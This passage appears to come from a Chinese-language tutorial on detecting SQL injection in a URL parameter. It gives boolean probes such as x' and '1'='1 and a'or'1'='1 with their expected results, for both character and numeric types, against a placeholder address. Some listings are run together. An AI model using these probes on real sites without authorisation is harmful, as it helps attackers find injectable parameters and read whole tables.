‘and '1'='1 和 ’and '1'='2来判断
http://xxx/abc.php?id= x' and '1'='1 页面运行正常,继续进行下一步。
http://xxx/abc.php?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。
构造测试 预期结果 变种
a'//触发错误,返回数据库错误 a'or'1'='1 //永真条件,返回所有记录 a') or ('1'=1a'or'1'='2 //空条件,返回原来相同结果 a') or ('1'=2a'and'1'='2 //永假条件,不返回记录 a') and ('1'='2
1
2
3
4
5
输入域的值为数字型
用1=1,1=2法
若满足条件,则存在SQL注入漏洞,程序没有对提交的整型参数的合法性做过滤或判断
http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。
http://xxx/abc.php?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。
构造测试 预期结果 变种
' //触发错误,返回数据库错误 1+1//返回原来相同的结果 3-11+0//返回原来相同的结果 1or1=1//永真条件,返回所有记录 1) or (1=11or1=2//空条件,返回原来相同的结果 1) or (1=21and1=2//永假条件,不返回记录 1) and (1=2